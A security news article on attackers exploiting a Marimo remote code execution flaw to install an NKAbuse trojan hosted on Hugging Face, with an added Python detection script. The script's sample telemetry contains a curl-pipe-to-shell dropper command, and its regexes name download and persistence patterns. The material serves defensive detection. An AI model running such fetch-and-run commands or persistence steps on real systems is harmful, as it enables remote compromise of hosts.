Hackers Leverage Hugging Face to Deploy NKAbuse via Marimo Flaw

Attackers are exploiting a critical Marimo remote code execution vulnerability, tracked as CVE-2026-39987, to deliver a new NKAbuse variant hosted on Hugging Face Spaces. Exploitation for credential theft began within ten hours of public disclosure, and Sysdig researchers observed further campaigns from April 12 that trade on the AI platform's legitimate reputation to evade detection. The attacker created a Space named vsccode-modetx that hosts a dropper script and a malware binary called kagent, a name chosen to mimic a legitimate Kubernetes tool.

After gaining initial access through the Marimo vulnerability, the threat actor runs a curl command that downloads the dropper script from Hugging Face; the script installs the binary and establishes persistence through systemd, cron, or a macOS LaunchAgent. The payload is a previously undocumented NKAbuse variant that functions as a remote access trojan, executing shell commands and returning their output to the operators. It communicates over the NKN decentralized peer-to-peer network and uses WebRTC and STUN for NAT traversal.
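The chain described above (a Marimo process spawning curl against a Hugging Face Space, followed by a persistence write to systemd, cron, or a LaunchAgent) lends itself to a simple correlation rule over process and file telemetry. The following is an added example written for this page, not code from the article or from Sysdig. The event schema, the exact Space URL path and script name, and the service/plist names are assumptions; the sample events are constructed, not real captures.

```python
"""Correlate a Marimo-spawned Hugging Face download with a later persistence write.

Added example for this page (not the article's or Sysdig's code). The JSON event
schema below is an assumption made for the example, not any particular EDR format.
"""
import json
import re

# Constructed sample telemetry (not real captures). Process-start events carry
# pid/ppid/exe/cmdline; file events carry pid/path/op.
SAMPLE_EVENTS = [
    '{"type":"proc","pid":100,"ppid":1,"exe":"/usr/bin/python3","cmdline":"python3 -m marimo edit --host 0.0.0.0"}',
    # Assumed dropper URL path and script name; only the Space name comes from the article.
    '{"type":"proc","pid":101,"ppid":100,"exe":"/bin/sh","cmdline":"sh -c curl -fsSL https://huggingface.co/spaces/vsccode-modetx/resolve/main/dropper.sh | sh"}',
    '{"type":"proc","pid":102,"ppid":101,"exe":"/usr/bin/curl","cmdline":"curl -fsSL https://huggingface.co/spaces/vsccode-modetx/resolve/main/dropper.sh"}',
    '{"type":"file","pid":101,"path":"/etc/systemd/system/kagent.service","op":"write"}',
    # Benign noise: a Marimo session fetching from PyPI, and an unrelated cron write.
    '{"type":"proc","pid":200,"ppid":1,"exe":"/usr/bin/python3","cmdline":"python3 -m marimo edit"}',
    '{"type":"proc","pid":201,"ppid":200,"exe":"/usr/bin/curl","cmdline":"curl -s https://pypi.org/simple/"}',
    '{"type":"file","pid":300,"path":"/etc/cron.d/backup","op":"write"}',
]

# Stage 1: curl/wget fetching anything under a Hugging Face Space.
DOWNLOADER = re.compile(r"\b(curl|wget)\b.*https?://huggingface\.co/spaces/", re.IGNORECASE)

# Stage 2: writes to the persistence locations named in the article
# (systemd units, cron, macOS LaunchAgents).
PERSISTENCE_PATHS = re.compile(
    r"^(/etc/systemd/system/|/lib/systemd/system/|/usr/lib/systemd/system/|"
    r"/home/[^/]+/\.config/systemd/user/|/etc/cron\.(d|hourly|daily|weekly|monthly)/|"
    r"/etc/crontab$|/var/spool/cron/|/Users/[^/]+/Library/LaunchAgents/|/Library/LaunchAgents/)"
)


def parse_events(lines):
    return [json.loads(line) for line in lines if line.strip()]


def build_tree(events):
    """Return (pid -> ppid, pid -> cmdline) maps from the process-start events."""
    parents, cmdlines = {}, {}
    for ev in events:
        if ev["type"] == "proc":
            parents[ev["pid"]] = ev["ppid"]
            cmdlines[ev["pid"]] = ev["cmdline"]
    return parents, cmdlines


def marimo_root(pid, parents, cmdlines):
    """Walk up the tree; return the nearest self-or-ancestor pid running marimo, else None."""
    seen = set()
    while pid in parents and pid not in seen:
        seen.add(pid)
        if "marimo" in cmdlines.get(pid, ""):
            return pid
        pid = parents[pid]
    return None


def analyze(lines):
    """Return findings for each stage that descends from a Marimo process."""
    events = parse_events(lines)
    parents, cmdlines = build_tree(events)
    findings = []
    for ev in events:
        if ev["type"] == "proc" and DOWNLOADER.search(ev["cmdline"]):
            root = marimo_root(ev["pid"], parents, cmdlines)
            if root is not None:
                findings.append({"stage": "dropper_download", "pid": ev["pid"], "root": root, "detail": ev["cmdline"]})
        elif ev["type"] == "file" and ev.get("op") == "write" and PERSISTENCE_PATHS.match(ev["path"]):
            root = marimo_root(ev["pid"], parents, cmdlines)
            if root is not None:
                findings.append({"stage": "persistence", "pid": ev["pid"], "root": root, "detail": ev["path"]})
    return findings


def severity(findings):
    """'high' when download and persistence both occur under the same Marimo process."""
    stages_by_root = {}
    for f in findings:
        stages_by_root.setdefault(f["root"], set()).add(f["stage"])
    if any({"dropper_download", "persistence"} <= stages for stages in stages_by_root.values()):
        return "high"
    return "medium" if findings else "none"


if __name__ == "__main__":
    results = analyze(SAMPLE_EVENTS)
    for finding in results:
        print(finding)
    print("severity:", severity(results))
```

Keying on the process ancestry rather than on the URL alone is what keeps the PyPI fetch and the unrelated cron write out of the alert: a Hugging Face download is ordinary on an ML host, but one spawned by a notebook server that then writes a systemd unit is the pattern the article describes.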

Other observed attacks include a Germany-based operator who attempted fifteen reverse-shell techniques across multiple ports before pivoting to PostgreSQL credential extraction and database enumeration, and a Hong Kong-based actor who used stolen environment credentials to target Redis servers, dumping session tokens and application cache entries. Sysdig warns that exploitation of CVE-2026-39987 has increased significantly and urges users to upgrade to Marimo 0.23.0 or later immediately. Those unable to upgrade should block all external access to the vulnerable terminal endpoint; since exploitation was seen within hours of disclosure, hosts that were exposed before patching should also be checked for the persistence artifacts described above.
